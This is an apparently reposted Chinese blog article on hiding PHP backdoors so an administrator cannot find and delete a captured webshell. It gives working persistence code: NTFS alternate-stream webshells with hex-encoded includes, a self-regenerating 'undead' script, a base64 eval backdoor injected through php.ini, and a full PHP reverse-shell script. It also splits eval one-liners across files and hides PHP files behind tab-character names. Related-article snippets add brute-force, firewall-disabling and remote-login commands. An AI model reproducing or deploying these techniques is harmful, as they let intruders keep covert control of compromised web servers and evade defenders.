php后门隐藏技巧大全

VSole2022-08-03 06:49:26

辛辛苦苦拿下的 shell,几天没看,管理员给删了。

其实隐藏的技巧也有很多

1.attrib +s +h

一创建系统隐藏文件:

attrib +s +a +r +h

attrib +s +h 文件名

在 Windows 10下即使开启了显示隐藏的项目,或dir仍然看不见。

2. 利用 ADS 隐藏文件

NTFS交换数据流(Alternate Data Streams,简称 ADS)是 NTFS 磁盘格式的一个特性,在 NTFS文件系统下,每个文件都可以存在多个数据流。

通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用ADS 数据流,我们可以做很多有趣的事情。(抄的)

首先创建 ADS 隐藏文件

在命令行,echo 一个数据流进去,比如 index 文件是正常文件。

echo ^ > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

使用dir /r查看

可使用命令直接修改,要删除的话 直接删除 index.php就ok了

第二步,直接使用正常文件包含。

做一些免杀
把 index.php:shell.jpg hex 编码
$a="696E6465782E7068703A7368656C6C2E6A7067";
// index.php:shell.jpg hex编码
$b="a";
include(PACK('H*',$$b))
?>

3.php环境变量留shell

在c盘创建这个目录

丢个图片一句话

然后文件包含,就好。为了隐蔽可以包含图片马,txt等。

4.不死马

运行后,会删除自身,生成一个 webshell.php,管理员删除后还会生成。

set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('webshell.php','');
sleep(5);
}

解决覆盖重写或者重启 web 服务删掉即可。

set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('webshell.php','clear');
sleep(1);
}

5. php.ini后门

将下面后门写入php.ini

allow_url_include=On
auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"
// base64 
// 后门类型可自己修改。

这些做好后,重启 web 服务就好了。

方法1. 如果权限很大的话,自己手动重启,缺点容易暴露,重启服务,就要上服务器,某里的服务器,异地登陆有短信提醒。

方法2.就是加载一个 php_socke.php 脚本,让他重新加载 php.ini

此后门,任何php都可菜刀连接

/******************************/
/*     只适用于windows系统     */
/******************************/
while(true){//别问我为什么要死循环,我也不清楚,只有设置成死循环才能加载新的 php.ini ...
@set_time_limit(0);
$system=strtoupper(substr(PHP_OS,0,3));
if(!extension_loaded('sockets'))
{
if($system=='WIN'){@dl('php_sockets.dll')ordie("Can't load socket");}
}
$host='255.255.255.255';//   搞一个不存在的ip,万一给人家反弹过去了岂不是真尴尬了~~~
$port=1998;//别问我为什么是1998,问了我也不会告诉你....
if($system=="WIN"){$env=array('path'=>'c:\\windows\\system32');}
$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"),);
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket创建失败");}
if(($ret=@socket_connect($sock,$host,$port))<0){die("连接失败");}
else{
$message="PHP反弹连接";
@socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=@socket_read($sock,65535,$proto))
{
if(trim(strtolower($cmd))=="exit"){
socket_write($sock,"Bye");exit;
}else{
$process=proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if(is_resource($process)){
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg=stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
$return_value=proc_close($process);
}
}
}
}
}
?>
//此脚本非百分百成功

6. 关键字拆分,多文件包含!

比如一句话:@eval($_POST['x']);我们可以写成$a=$_POST['x'];@eval($a);

我们可以将 $a=$_POST['x'];写入一个文件 POST.php

然后在 @eval($a); 一句话的上方使用 include "POST.php";的方式引用!

7.将真正的一句话写入数据库

当我们发现源码有个地方执行了数据库操作,那我们就可以改源码和数据库啦~

比如,修改成 eval(查出的数据);

8.以下是linux的

无意中发现的。具体看代码。

$webpath = dirname(__FILE__)."/";
file_put_contents($webpath ."guige.jpg".chr(9).".php","保存的内容(比如写
个一句话)");
?>

生成一个文件。

在目录下看到是显示 名字为 guige.jpg

但是 web 浏览 却发现 没有找到 guige.jpg 后来发现 需要添 guige.jpg%09.php  

这样的话就导致我们可以对后门隐藏了。。管理员看到的是.jpg 我们却可以 web 用.php 解析来

连接。。。有用的到的可以看看。

shellphp
本作品采用《CC 协议》,转载必须注明作者和本文链接
在Web系统中,允许用户上传文件作为一个基本功能是必不可少的,如论坛允许用户上传附件,多媒体网站允许用户上传图片,视频网站允许上传头像、视频等。但如果不能正确地认识到上传带来的风险,不加防范,会给整个系统带来毁灭性的灾难。
WSH是一款功能强大的Web Shell生成器和命令行接口工具。WSH的客户端支持命令历史记录和日志记录功能,并且可以跟以前部署的标准Webshell交互。生成器使用了PHP、ASP和JSP来创建Webshell。它们使用随机变量生成,因此每一个都拥有单独的哈希。它们可以使用白名单或密码进行配置,并允许通过自定义Header和参数进行发送。广大研究人员可以使用下列命令将该项目源码克隆至本地:
在2号机上右击,以管理员权限执行,kali就可以接收到反弹回来的shell,对shell进行操作。使用ms-sql-brute模块对6号机sa账户进行爆破,获得用户名为sa,密码为123456nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktopame.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116. 使用sqltools获取6号机数据库用xp_cmdshell关闭防火墙限制netsh firewall set opmode mode=disable. 添加3389入站规则netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow. 抓到域控管理员账号和密码:在4号机上,使用以下命令建立IPC$连接net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"
常用反弹shell方法总结
反弹shell汇总
2021-07-28 10:01:11
反弹shell汇总
01目录扫描分析代码这是一道很好反序列化字符串溢出的题目,首先打开容器看到这是一个上传点先进行目录扫描,
超实用的网络安全开源工具
神兵利器 - presshell
2022-07-27 17:42:09
您还可以使用ip和port参数打开反向 shell。为了方便,还提供了一个选项,可以无条件地将文件上传到插件的目录,而无需检查。对公共或私人服务器进行未经授权的攻击是非法的。
VSole
网络安全专家